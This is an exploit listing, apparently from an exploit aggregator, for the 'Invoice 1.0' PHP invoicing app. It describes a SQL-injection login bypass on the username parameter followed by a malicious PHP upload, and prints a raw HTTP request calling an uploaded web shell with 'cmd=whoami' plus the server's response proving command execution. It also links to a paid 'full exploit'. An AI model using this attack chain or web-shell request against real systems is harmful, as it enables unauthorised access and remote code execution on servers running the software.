Exploit for Invoice 1.0 SQL Injection / Shell Upload

Name: Exploit for Invoice 1.0 SQL Injection / Shell Upload
Rating: 5 (36 reviews)
2025-04-07 | CVSS 8.6
## https://sploitus.com/exploit?id=PACKETSTORM:190314
# Titles: INVOICE-1.0-Copyright©2025-SQLi-Bypass-Authentication+FU+RCE
    # Author: nu11secur1ty
    # Date: 04/07/2025
    # Vendor: https://github.com/oretnom23
    # Software:
    https://www.sourcecodester.com/php/14858/invoice-system-using-phpoop-free-source-code.html
    # Reference: https://portswigger.net/web-security/sql-injection >
    https://portswigger.net/daily-swig/rce
    
    ### Description:
    The username parameter appears to be vulnerable to SQL-bypass
    authentication injection attacks.
    The attacker can log in to this system by using this vulnerability, and
    then he can upload a malicious PHP file to this system.
    After upload, he can execute this PHP file, and he can get sensitive
    information and even he can manage the system inside, it
    depends on the scenario!
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Exploit:
    
    ```RCE
    ---
    GET /pwnedhost/simple_invoice/uploads/1744008900_RCE.php?cmd=whoami HTTP/1.1
    Host: 192.168.100.45
    Cookie: PHPSESSID=divmu5157smqqnv6j7efs8br5p
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not:A-Brand";v="24", "Chromium";v="134"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0)
    Gecko/20100101 Firefox/134.0
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Priority: u=0, i
    Connection: keep-alive
    ```
    [+]Response:
    
    ```RCE-response:
    HTTP/1.1 200 OK
    Date: Mon, 07 Apr 2025 07:48:39 GMT
    Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
    X-Powered-By: PHP/8.2.4
    Access-Control-Allow-Origin: *
    Content-Length: 29
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    
    desktop-ahflgug\nu11secur1ty
    ```
    
    # Reproduce:
    [href](https://www.patreon.com/posts/invoice-1-c-2025-126106368)
    
    # Buy the full exploit:
    [href](https://satoshidisk.com/pay/CO7bRi)
    
    # Time spent:
    01:15:00